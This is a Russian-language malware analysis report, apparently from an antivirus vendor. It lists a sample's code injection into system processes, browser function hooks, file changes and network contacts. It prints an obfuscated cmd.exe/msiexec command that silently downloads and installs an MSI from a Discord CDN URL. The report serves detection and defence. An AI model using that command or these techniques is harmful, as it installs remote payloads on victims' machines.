Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
следующие пользовательские процессы:
- iexplore.exe
Перехватывает функции
в браузерах
- Процесс iexplore.exe, модуль wininet.dll
- Процесс firefox.exe, модуль nss3.dll
Изменения в файловой системе
Создает следующие файлы
- %BOOT_VOL%\boot\bcd.log
- %BOOT_VOL%\boot\bcd
- %TEMP%\nsyd02b.tmp
- %TEMP%\64cgbfdn23gia0
- %TEMP%\h5zr3pu7px
- %TEMP%\nsyd07a.tmp\5rov.dll
Удаляет следующие файлы
- %WINDIR%\installer\msicf52.tmp
Изменяет следующие файлы
- %LOCALAPPDATA%\microsoft\windows\usrclass.dat.log1
- %LOCALAPPDATA%\microsoft\windows\usrclass.dat
Сетевая активность
Подключается к
- 'cd#.##scordapp.com':443
- 'af#######ebathroomsarizona.com':80
- 'pr###12580.com':80
- 'ia##c.com':80
TCP
- 'cd#.##scordapp.com':443
UDP
- DNS ASK cd#.##scordapp.com
- DNS ASK af#######ebathroomsarizona.com
- DNS ASK ok######sundayschool.com
- DNS ASK pr###12580.com
- DNS ASK ia##c.com
- DNS ASK bj##ygg.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msicf52.tmp'
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\msiexec.exe' /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
- '%WINDIR%\syswow64\wuapp.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSICF52.tmp"
